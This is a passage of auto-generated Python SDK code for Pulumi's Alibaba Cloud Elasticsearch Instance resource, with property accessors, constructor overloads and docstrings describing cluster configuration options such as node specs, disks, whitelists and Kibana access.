pulumi.set(__self__, "protocol", protocol)
if public_whitelists is not None:
pulumi.set(__self__, "public_whitelists", public_whitelists)
if resource_group_id is not None:
pulumi.set(__self__, "resource_group_id", resource_group_id)
if setting_config is not None:
pulumi.set(__self__, "setting_config", setting_config)
if status is not None:
pulumi.set(__self__, "status", status)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if version is not None:
pulumi.set(__self__, "version", version)
if vswitch_id is not None:
pulumi.set(__self__, "vswitch_id", vswitch_id)
if zone_count is not None:
pulumi.set(__self__, "zone_count", zone_count)
@property
@pulumi.getter(name="clientNodeAmount")
def client_node_amount(self) -> Optional[pulumi.Input[int]]:
"""
The Elasticsearch cluster's client node quantity, between 2 and 25.
"""
return pulumi.get(self, "client_node_amount")
@client_node_amount.setter
def client_node_amount(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "client_node_amount", value)
@property
@pulumi.getter(name="clientNodeSpec")
def client_node_spec(self) -> Optional[pulumi.Input[str]]:
"""
The client node spec. If specified, client node will be created.
"""
return pulumi.get(self, "client_node_spec")
@client_node_spec.setter
def client_node_spec(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_node_spec", value)
@property
@pulumi.getter(name="dataNodeAmount")
def data_node_amount(self) -> Optional[pulumi.Input[int]]:
"""
The Elasticsearch cluster's data node quantity, between 2 and 50.
"""
return pulumi.get(self, "data_node_amount")
@data_node_amount.setter
def data_node_amount(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "data_node_amount", value)
@property
@pulumi.getter(name="dataNodeDiskEncrypted")
def data_node_disk_encrypted(self) -> Optional[pulumi.Input[bool]]:
"""
If encrypt the data node disk. Valid values are `true`, `false`. Default to `false`.
"""
return pulumi.get(self, "data_node_disk_encrypted")
@data_node_disk_encrypted.setter
def data_node_disk_encrypted(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "data_node_disk_encrypted", value)
@property
@pulumi.getter(name="dataNodeDiskSize")
def data_node_disk_size(self) -> Optional[pulumi.Input[int]]:
"""
The single data node storage space.
- `cloud_ssd`: An SSD disk, supports a maximum of 2048 GiB (2 TB).
"""
return pulumi.get(self, "data_node_disk_size")
@data_node_disk_size.setter
def data_node_disk_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "data_node_disk_size", value)
@property
@pulumi.getter(name="dataNodeDiskType")
def data_node_disk_type(self) -> Optional[pulumi.Input[str]]:
"""
The data node disk type. Supported values: cloud_ssd, cloud_efficiency.
"""
return pulumi.get(self, "data_node_disk_type")
@data_node_disk_type.setter
def data_node_disk_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_node_disk_type", value)
@property
@pulumi.getter(name="dataNodeSpec")
def data_node_spec(self) -> Optional[pulumi.Input[str]]:
"""
The data node specifications of the Elasticsearch instance.
"""
return pulumi.get(self, "data_node_spec")
@data_node_spec.setter
def data_node_spec(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_node_spec", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of instance. It a string of 0 to 30 characters.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def domain(self) -> Optional[pulumi.Input[str]]:
"""
Instance connection domain (only VPC network access supported).
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter(name="enableKibanaPrivateNetwork")
def enable_kibana_private_network(self) -> Optional[pulumi.Input[bool]]:
"""
Bool, default to false. When it set to true, the instance can close kibana private network access。
"""
return pulumi.get(self, "enable_kibana_private_network")
@enable_kibana_private_network.setter
def enable_kibana_private_network(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_kibana_private_network", value)
@property
@pulumi.getter(name="enableKibanaPublicNetwork")
def enable_kibana_public_network(self) -> Optional[pulumi.Input[bool]]:
"""
Bool, default to true. When it set to false, the instance can enable kibana public network access。
"""
return pulumi.get(self, "enable_kibana_public_network")
@enable_kibana_public_network.setter
def enable_kibana_public_network(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_kibana_public_network", value)
@property
@pulumi.getter(name="enablePublic")
def enable_public(self) -> Optional[pulumi.Input[bool]]:
"""
Bool, default to false. When it set to true, the instance can enable public network access。
"""
return pulumi.get(self, "enable_public")
@enable_public.setter
def enable_public(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_public", value)
@property
@pulumi.getter(name="instanceChargeType")
def instance_charge_type(self) -> Optional[pulumi.Input[str]]:
"""
Valid values are `PrePaid`, `PostPaid`. Default to `PostPaid`. From version 1.69.0, the Elasticsearch cluster allows you to update your instance_charge_ype from `PostPaid` to `PrePaid`, the following attributes are required: `period`. But, updating from `PostPaid` to `PrePaid` is not supported.
"""
return pulumi.get(self, "instance_charge_type")
@instance_charge_type.setter
def instance_charge_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "instance_charge_type", value)
@property
@pulumi.getter(name="kibanaDomain")
def kibana_domain(self) -> Optional[pulumi.Input[str]]:
"""
Kibana console domain (Internet access supported).
"""
return pulumi.get(self, "kibana_domain")
@kibana_domain.setter
def kibana_domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kibana_domain", value)
@property
@pulumi.getter(name="kibanaPort")
def kibana_port(self) -> Optional[pulumi.Input[int]]:
"""
Kibana console port.
"""
return pulumi.get(self, "kibana_port")
@kibana_port.setter
def kibana_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "kibana_port", value)
@property
@pulumi.getter(name="kibanaPrivateWhitelists")
def kibana_private_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Set the Kibana's IP whitelist in private network.
"""
return pulumi.get(self, "kibana_private_whitelists")
@kibana_private_whitelists.setter
def kibana_private_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "kibana_private_whitelists", value)
@property
@pulumi.getter(name="kibanaWhitelists")
def kibana_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Set the Kibana's IP whitelist in internet network.
"""
return pulumi.get(self, "kibana_whitelists")
@kibana_whitelists.setter
def kibana_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "kibana_whitelists", value)
@property
@pulumi.getter(name="kmsEncryptedPassword")
def kms_encrypted_password(self) -> Optional[pulumi.Input[str]]:
"""
An KMS encrypts password used to a instance. If the `password` is filled in, this field will be ignored, but you have to specify one of `password` and `kms_encrypted_password` fields.
"""
return pulumi.get(self, "kms_encrypted_password")
@kms_encrypted_password.setter
def kms_encrypted_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_encrypted_password", value)
@property
@pulumi.getter(name="kmsEncryptionContext")
def kms_encryption_context(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
An KMS encryption context used to decrypt `kms_encrypted_password` before creating or updating instance with `kms_encrypted_password`. See [Encryption Context](https://www.alibabacloud.com/help/doc-detail/42975.htm). It is valid when `kms_encrypted_password` is set.
"""
return pulumi.get(self, "kms_encryption_context")
@kms_encryption_context.setter
def kms_encryption_context(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "kms_encryption_context", value)
@property
@pulumi.getter(name="masterNodeSpec")
def master_node_spec(self) -> Optional[pulumi.Input[str]]:
"""
The dedicated master node spec. If specified, dedicated master node will be created.
"""
return pulumi.get(self, "master_node_spec")
@master_node_spec.setter
def master_node_spec(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "master_node_spec", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The password of the instance. The password can be 8 to 30 characters in length and must contain three of the following conditions: uppercase letters, lowercase letters, numbers, and special characters (`!@#$%^&*()_+-=`).
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def period(self) -> Optional[pulumi.Input[int]]:
"""
The duration that you will buy Elasticsearch instance (in month). It is valid when instance_charge_type is `PrePaid`. Valid values: [1~9], 12, 24, 36. Default to 1. From version 1.69.2, when to modify this value, the resource can renewal a `PrePaid` instance.
"""
return pulumi.get(self, "period")
@period.setter
def period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "period", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
Instance connection port.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="privateWhitelists")
def private_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Set the instance's IP whitelist in VPC network.
"""
return pulumi.get(self, "private_whitelists")
@private_whitelists.setter
def private_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "private_whitelists", value)
@property
@pulumi.getter
def protocol(self) -> Optional[pulumi.Input[str]]:
"""
Elasticsearch protocol. Supported values: `HTTP`, `HTTPS`.default is `HTTP`.
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="publicWhitelists")
def public_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Set the instance's IP whitelist in internet network.
"""
return pulumi.get(self, "public_whitelists")
@public_whitelists.setter
def public_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "public_whitelists", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The Id of resource group which the Elasticsearch instance belongs.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_id", value)
@property
@pulumi.getter(name="settingConfig")
def setting_config(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
The YML configuration of the instance.[Detailed introduction](https://www.alibabacloud.com/help/doc-detail/61336.html).
"""
return pulumi.get(self, "setting_config")
@setting_config.setter
def setting_config(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "setting_config", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
The Elasticsearch instance status. Includes `active`, `activating`, `inactive`. Some operations are denied when status is not `active`.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
A mapping of tags to assign to the resource.
- key: It can be up to 128 characters in length. It cannot begin with "aliyun", "acs:". It cannot contain "http://" and "https://". It cannot be a null string.
- value: It can be up to 128 characters in length. It cannot contain "http://" and "https://". It can be a null string.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
Elasticsearch version. Supported values: `5.5.3_with_X-Pack`, `6.3_with_X-Pack`, `6.7_with_X-Pack`, `6.8_with_X-Pack`, `7.4_with_X-Pack` and `7.7_with_X-Pack`.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
@property
@pulumi.getter(name="vswitchId")
def vswitch_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of VSwitch.
"""
return pulumi.get(self, "vswitch_id")
@vswitch_id.setter
def vswitch_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vswitch_id", value)
@property
@pulumi.getter(name="zoneCount")
def zone_count(self) -> Optional[pulumi.Input[int]]:
"""
The Multi-AZ supported for Elasticsearch, between 1 and 3. The `data_node_amount` value must be an integral multiple of the `zone_count` value.
"""
return pulumi.get(self, "zone_count")
@zone_count.setter
def zone_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "zone_count", value)
class Instance(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
client_node_amount: Optional[pulumi.Input[int]] = None,
client_node_spec: Optional[pulumi.Input[str]] = None,
data_node_amount: Optional[pulumi.Input[int]] = None,
data_node_disk_encrypted: Optional[pulumi.Input[bool]] = None,
data_node_disk_size: Optional[pulumi.Input[int]] = None,
data_node_disk_type: Optional[pulumi.Input[str]] = None,
data_node_spec: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
enable_kibana_private_network: Optional[pulumi.Input[bool]] = None,
enable_kibana_public_network: Optional[pulumi.Input[bool]] = None,
enable_public: Optional[pulumi.Input[bool]] = None,
instance_charge_type: Optional[pulumi.Input[str]] = None,
kibana_private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
kibana_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
kms_encrypted_password: Optional[pulumi.Input[str]] = None,
kms_encryption_context: Optional[pulumi.Input[Mapping[str, Any]]] = None,
master_node_spec: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
period: Optional[pulumi.Input[int]] = None,
private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
protocol: Optional[pulumi.Input[str]] = None,
public_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
setting_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
version: Optional[pulumi.Input[str]] = None,
vswitch_id: Optional[pulumi.Input[str]] = None,
zone_count: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
Provides a Elasticsearch instance resource. It contains data nodes, dedicated master node(optional) and etc. It can be associated with private IP whitelists and kibana IP whitelist.
> **NOTE:** Only one operation is supported in a request. So if `data_node_spec` and `data_node_disk_size` are both changed, system will respond error.
> **NOTE:** At present, `version` can not be modified once instance has been created.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
instance = alicloud.elasticsearch.Instance("instance",
client_node_amount=2,
client_node_spec="elasticsearch.sn2ne.large",
data_node_amount=2,
data_node_disk_size=20,
data_node_disk_type="cloud_ssd",
data_node_spec="elasticsearch.sn2ne.large",
description="description",
instance_charge_type="PostPaid",
password="Your password",
protocol="HTTPS",
tags={
"key1": "value1",
"key2": "value2",
},
version="5.5.3_with_X-Pack",
vswitch_id="some vswitch id",
zone_count=2)
```
## Import
Elasticsearch can be imported using the id, e.g.
```sh
$ pulumi import alicloud:elasticsearch/instance:Instance example es-cn-abcde123456
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] client_node_amount: The Elasticsearch cluster's client node quantity, between 2 and 25.
:param pulumi.Input[str] client_node_spec: The client node spec. If specified, client node will be created.
:param pulumi.Input[int] data_node_amount: The Elasticsearch cluster's data node quantity, between 2 and 50.
:param pulumi.Input[bool] data_node_disk_encrypted: If encrypt the data node disk. Valid values are `true`, `false`. Default to `false`.
:param pulumi.Input[int] data_node_disk_size: The single data node storage space.
- `cloud_ssd`: An SSD disk, supports a maximum of 2048 GiB (2 TB).
:param pulumi.Input[str] data_node_disk_type: The data node disk type. Supported values: cloud_ssd, cloud_efficiency.
:param pulumi.Input[str] data_node_spec: The data node specifications of the Elasticsearch instance.
:param pulumi.Input[str] description: The description of instance. It a string of 0 to 30 characters.
:param pulumi.Input[bool] enable_kibana_private_network: Bool, default to false. When it set to true, the instance can close kibana private network access。
:param pulumi.Input[bool] enable_kibana_public_network: Bool, default to true. When it set to false, the instance can enable kibana public network access。
:param pulumi.Input[bool] enable_public: Bool, default to false. When it set to true, the instance can enable public network access。
:param pulumi.Input[str] instance_charge_type: Valid values are `PrePaid`, `PostPaid`. Default to `PostPaid`. From version 1.69.0, the Elasticsearch cluster allows you to update your instance_charge_ype from `PostPaid` to `PrePaid`, the following attributes are required: `period`. But, updating from `PostPaid` to `PrePaid` is not supported.
:param pulumi.Input[Sequence[pulumi.Input[str]]] kibana_private_whitelists: Set the Kibana's IP whitelist in private network.
:param pulumi.Input[Sequence[pulumi.Input[str]]] kibana_whitelists: Set the Kibana's IP whitelist in internet network.
:param pulumi.Input[str] kms_encrypted_password: An KMS encrypts password used to a instance. If the `password` is filled in, this field will be ignored, but you have to specify one of `password` and `kms_encrypted_password` fields.
:param pulumi.Input[Mapping[str, Any]] kms_encryption_context: An KMS encryption context used to decrypt `kms_encrypted_password` before creating or updating instance with `kms_encrypted_password`. See [Encryption Context](https://www.alibabacloud.com/help/doc-detail/42975.htm). It is valid when `kms_encrypted_password` is set.
:param pulumi.Input[str] master_node_spec: The dedicated master node spec. If specified, dedicated master node will be created.
:param pulumi.Input[str] password: The password of the instance. The password can be 8 to 30 characters in length and must contain three of the following conditions: uppercase letters, lowercase letters, numbers, and special characters (`!@#$%^&*()_+-=`).
:param pulumi.Input[int] period: The duration that you will buy Elasticsearch instance (in month). It is valid when instance_charge_type is `PrePaid`. Valid values: [1~9], 12, 24, 36. Default to 1. From version 1.69.2, when to modify this value, the resource can renewal a `PrePaid` instance.
:param pulumi.Input[Sequence[pulumi.Input[str]]] private_whitelists: Set the instance's IP whitelist in VPC network.
:param pulumi.Input[str] protocol: Elasticsearch protocol. Supported values: `HTTP`, `HTTPS`.default is `HTTP`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] public_whitelists: Set the instance's IP whitelist in internet network.
:param pulumi.Input[str] resource_group_id: The Id of resource group which the Elasticsearch instance belongs.
:param pulumi.Input[Mapping[str, Any]] setting_config: The YML configuration of the instance.[Detailed introduction](https://www.alibabacloud.com/help/doc-detail/61336.html).
:param pulumi.Input[Mapping[str, Any]] tags: A mapping of tags to assign to the resource.
- key: It can be up to 128 characters in length. It cannot begin with "aliyun", "acs:". It cannot contain "http://" and "https://". It cannot be a null string.
- value: It can be up to 128 characters in length. It cannot contain "http://" and "https://". It can be a null string.
:param pulumi.Input[str] version: Elasticsearch version. Supported values: `5.5.3_with_X-Pack`, `6.3_with_X-Pack`, `6.7_with_X-Pack`, `6.8_with_X-Pack`, `7.4_with_X-Pack` and `7.7_with_X-Pack`.
:param pulumi.Input[str] vswitch_id: The ID of VSwitch.
:param pulumi.Input[int] zone_count: The Multi-AZ supported for Elasticsearch, between 1 and 3. The `data_node_amount` value must be an integral multiple of the `zone_count` value.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: InstanceArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Elasticsearch instance resource. It contains data nodes, dedicated master node(optional) and etc. It can be associated with private IP whitelists and kibana IP whitelist.
> **NOTE:** Only one operation is supported in a request. So if `data_node_spec` and `data_node_disk_size` are both changed, system will respond error.
> **NOTE:** At present, `version` can not be modified once instance has been created.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
instance = alicloud.elasticsearch.Instance("instance",
client_node_amount=2,
client_node_spec="elasticsearch.sn2ne.large",
data_node_amount=2,
data_node_disk_size=20,
data_node_disk_type="cloud_ssd",
data_node_spec="elasticsearch.sn2ne.large",
description="description",
instance_charge_type="PostPaid",
password="Your password",
protocol="HTTPS",
tags={
"key1": "value1",
"key2": "value2",
},
version="5.5.3_with_X-Pack",
vswitch_id="some vswitch id",
zone_count=2)
```
## Import
Elasticsearch can be imported using the id, e.g.
```sh
$ pulumi import alicloud:elasticsearch/instance:Instance example es-cn-abcde123456
```
:param str resource_name: The name of the resource.
:param InstanceArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(InstanceArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
client_node_amount: Optional[pulumi.Input[int]] = None,
client_node_spec: Optional[pulumi.Input[str]] = None,
data_node_amount: Optional[pulumi.Input[int]] = None,
data_node_disk_encrypted: Optional[pulumi.Input[bool]] = None,
data_node_disk_size: Optional[pulumi.Input[int]] = None,
data_node_disk_type: Optional[pulumi.Input[str]] = None,
data_node_spec: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
enable_kibana_private_network: Optional[pulumi.Input[bool]] = None,
enable_kibana_public_network: Optional[pulumi.Input[bool]] = None,
enable_public: Optional[pulumi.Input[bool]] = None,
instance_charge_type: Optional[pulumi.Input[str]] = None,
kibana_private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
kibana_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
kms_encrypted_password: Optional[pulumi.Input[str]] = None,
kms_encryption_context: Optional[pulumi.Input[Mapping[str, Any]]] = None,
master_node_spec: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
period: Optional[pulumi.Input[int]] = None,
private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
protocol: Optional[pulumi.Input[str]] = None,
public_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
setting_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
version: Optional[pulumi.Input[str]] = None,
vswitch_id: Optional[pulumi.Input[str]] = None,
zone_count: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = InstanceArgs.__new__(InstanceArgs)
__props__.__dict__["client_node_amount"] = client_node_amount
__props__.__dict__["client_node_spec"] = client_node_spec
if data_node_amount is None and not opts.urn:
raise TypeError("Missing required property 'data_node_amount'")
__props__.__dict__["data_node_amount"] = data_node_amount
__props__.__dict__["data_node_disk_encrypted"] = data_node_disk_encrypted
if data_node_disk_size is None and not opts.urn:
raise TypeError("Missing required property 'data_node_disk_size'")
__props__.__dict__["data_node_disk_size"] = data_node_disk_size
if data_node_disk_type is None and not opts.urn:
raise TypeError("Missing required property 'data_node_disk_type'")
__props__.__dict__["data_node_disk_type"] = data_node_disk_type
if data_node_spec is None and not opts.urn:
raise TypeError("Missing required property 'data_node_spec'")
__props__.__dict__["data_node_spec"] = data_node_spec
__props__.__dict__["description"] = description
__props__.__dict__["enable_kibana_private_network"] = enable_kibana_private_network
__props__.__dict__["enable_kibana_public_network"] = enable_kibana_public_network
__props__.__dict__["enable_public"] = enable_public
__props__.__dict__["instance_charge_type"] = instance_charge_type
__props__.__dict__["kibana_private_whitelists"] = kibana_private_whitelists
__props__.__dict__["kibana_whitelists"] = kibana_whitelists
__props__.__dict__["kms_encrypted_password"] = kms_encrypted_password
__props__.__dict__["kms_encryption_context"] = kms_encryption_context
__props__.__dict__["master_node_spec"] = master_node_spec
__props__.__dict__["password"] = password
__props__.__dict__["period"] = period
__props__.__dict__["private_whitelists"] = private_whitelists
__props__.__dict__["protocol"] = protocol
__props__.__dict__["public_whitelists"] = public_whitelists
__props__.__dict__["resource_group_id"] = resource_group_id
__props__.__dict__["setting_config"] = setting_config
__props__.__dict__["tags"] = tags
if version is None and not opts.urn:
raise TypeError("Missing required property 'version'")
__props__.__dict__["version"] = version
if vswitch_id is None and not opts.urn:
raise TypeError("Missing required property 'vswitch_id'")
__props__.__dict__["vswitch_id"] = vswitch_id
__props__.__dict__["zone_count"] = zone_count
__props__.__dict__["domain"] = None
__props__.__dict__["kibana_domain"] = None
__props__.__dict__["kibana_port"] = None
__props__.__dict__["port"] = None
__props__.__dict__["status"] = None
super(Instance, __self__).__init__(
'alicloud:elasticsearch/instance:Instance',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
client_node_amount: Optional[pulumi.Input[int]] = None,
client_node_spec: Optional[pulumi.Input[str]] = None,
data_node_amount: Optional[pulumi.Input[int]] = None,
data_node_disk_encrypted: Optional[pulumi.Input[bool]] = None,
data_node_disk_size: Optional[pulumi.Input[int]] = None,
data_node_disk_type: Optional[pulumi.Input[str]] = None,
data_node_spec: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
enable_kibana_private_network: Optional[pulumi.Input[bool]] = None,
enable_kibana_public_network: Optional[pulumi.Input[bool]] = None,
enable_public: Optional[pulumi.Input[bool]] = None,
instance_charge_type: Optional[pulumi.Input[str]] = None,
kibana_domain: Optional[pulumi.Input[str]] = None,
kibana_port: Optional[pulumi.Input[int]] = None,
kibana_private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
kibana_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
kms_encrypted_password: Optional[pulumi.Input[str]] = None,
kms_encryption_context: Optional[pulumi.Input[Mapping[str, Any]]] = None,
master_node_spec: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
period: Optional[pulumi.Input[int]] = None,
port: Optional[pulumi.Input[int]] = None,
private_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
protocol: Optional[pulumi.Input[str]] = None,
public_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
setting_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
version: Optional[pulumi.Input[str]] = None,
vswitch_id: Optional[pulumi.Input[str]] = None,
zone_count: Optional[pulumi.Input[int]] = None) -> 'Instance':
"""
Get an existing Instance resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] client_node_amount: The Elasticsearch cluster's client node quantity, between 2 and 25.
:param pulumi.Input[str] client_node_spec: The client node spec. If specified, client node will be created.
:param pulumi.Input[int] data_node_amount: The Elasticsearch cluster's data node quantity, between 2 and 50.
:param pulumi.Input[bool] data_node_disk_encrypted: If encrypt the data node disk. Valid values are `true`, `false`. Default to `false`.
:param pulumi.Input[int] data_node_disk_size: The single data node storage space.
- `cloud_ssd`: An SSD disk, supports a maximum of 2048 GiB (2 TB).
:param pulumi.Input[str] data_node_disk_type: The data node disk type. Supported values: cloud_ssd, cloud_efficiency.
:param pulumi.Input[str] data_node_spec: The data node specifications of the Elasticsearch instance.
:param pulumi.Input[str] description: The description of instance. It a string of 0 to 30 characters.
:param pulumi.Input[str] domain: Instance connection domain (only VPC network access supported).
:param pulumi.Input[bool] enable_kibana_private_network: Bool, default to false. When it set to true, the instance can close kibana private network access。
:param pulumi.Input[bool] enable_kibana_public_network: Bool, default to true. When it set to false, the instance can enable kibana public network access。
:param pulumi.Input[bool] enable_public: Bool, default to false. When it set to true, the instance can enable public network access。
:param pulumi.Input[str] instance_charge_type: Valid values are `PrePaid`, `PostPaid`. Default to `PostPaid`. From version 1.69.0, the Elasticsearch cluster allows you to update your instance_charge_ype from `PostPaid` to `PrePaid`, the following attributes are required: `period`. But, updating from `PostPaid` to `PrePaid` is not supported.
:param pulumi.Input[str] kibana_domain: Kibana console domain (Internet access supported).
:param pulumi.Input[int] kibana_port: Kibana console port.
:param pulumi.Input[Sequence[pulumi.Input[str]]] kibana_private_whitelists: Set the Kibana's IP whitelist in private network.
:param pulumi.Input[Sequence[pulumi.Input[str]]] kibana_whitelists: Set the Kibana's IP whitelist in internet network.
:param pulumi.Input[str] kms_encrypted_password: An KMS encrypts password used to a instance. If the `password` is filled in, this field will be ignored, but you have to specify one of `password` and `kms_encrypted_password` fields.
:param pulumi.Input[Mapping[str, Any]] kms_encryption_context: An KMS encryption context used to decrypt `kms_encrypted_password` before creating or updating instance with `kms_encrypted_password`. See [Encryption Context](https://www.alibabacloud.com/help/doc-detail/42975.htm). It is valid when `kms_encrypted_password` is set.
:param pulumi.Input[str] master_node_spec: The dedicated master node spec. If specified, dedicated master node will be created.
:param pulumi.Input[str] password: The password of the instance. The password can be 8 to 30 characters in length and must contain three of the following conditions: uppercase letters, lowercase letters, numbers, and special characters (`!@#$%^&*()_+-=`).
:param pulumi.Input[int] period: The duration that you will buy Elasticsearch instance (in month). It is valid when instance_charge_type is `PrePaid`. Valid values: [1~9], 12, 24, 36. Default to 1. From version 1.69.2, when to modify this value, the resource can renewal a `PrePaid` instance.
:param pulumi.Input[int] port: Instance connection port.
:param pulumi.Input[Sequence[pulumi.Input[str]]] private_whitelists: Set the instance's IP whitelist in VPC network.
:param pulumi.Input[str] protocol: Elasticsearch protocol. Supported values: `HTTP`, `HTTPS`.default is `HTTP`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] public_whitelists: Set the instance's IP whitelist in internet network.
:param pulumi.Input[str] resource_group_id: The Id of resource group which the Elasticsearch instance belongs.
